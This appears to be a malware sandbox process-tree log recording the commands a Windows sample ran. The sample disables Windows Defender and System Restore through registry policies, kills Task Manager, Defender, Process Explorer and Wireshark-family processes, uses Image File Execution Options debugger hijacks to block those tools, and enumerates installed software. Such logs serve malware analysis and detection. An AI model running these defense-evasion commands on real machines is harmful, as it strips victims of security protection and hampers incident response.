C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1944
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1832
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:2004
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1604
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:1896
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:1300
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:1496
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:580
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:1856
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1572
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1900
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:1648
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1504
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:836
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:620
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:1864
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1796
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1088
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1984
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:1660
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:1824
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:1564
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:2000
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:792
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1848
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:1300
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:268
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1840
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:1640
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:2028
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:860
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:1032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:528
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:1608
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1940
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:620
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1368
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1796
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1584
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1792
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:792
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:892
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:832
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:2032
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1924
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:436
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:1032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:1140
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1280
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1640
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:1792
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:1960
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1888
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:1480
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:436
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:1140
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:832
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:2052
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2064
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵PID:2100
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵PID:2116
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2132
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:2184
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:2208
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2144
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2220
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:2232
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:2264
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2244
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2276
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:2292
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:2304
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2324
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵PID:2344
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵PID:2368
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2392
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:2408
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:2488
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2432
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2512
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:2536
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:2568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2592
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵PID:2624
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:2692
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2612
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2704
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:2716
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:2732
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2752
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2784
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:2800
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:2816
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2828
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:2852
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:2868
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2880
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:2916
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:2932
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:2892
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2960
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:2972
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:2988
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:3008
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:2092
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:1584
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1572
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:2264
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2108
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2240
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2304
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2352
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:2132
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:2544
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2412
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2568
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2224
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2692
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:2824
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:520
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1332
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2840
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2916
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2932
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:276
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1804
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1496
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:2788
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:3024
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1272
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:1852
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:1776
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1088
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1920
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:1924
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1936
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:240
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1132
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2204
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1484
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:560
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:2000
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:584
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:664
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1632
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:1300
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:2996
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:2992
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1448
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:1588
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:3016
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:3064
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:580
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1660
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:1800
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:2120
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2364
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1876
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:892
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1980
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:2076
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:2152
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2052
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:2156
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:2380
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2104
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:2080
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:2160
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1656
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:1888
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:1576
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2228
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:2300
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:2236
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1832
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:956
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:2548
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2368
-
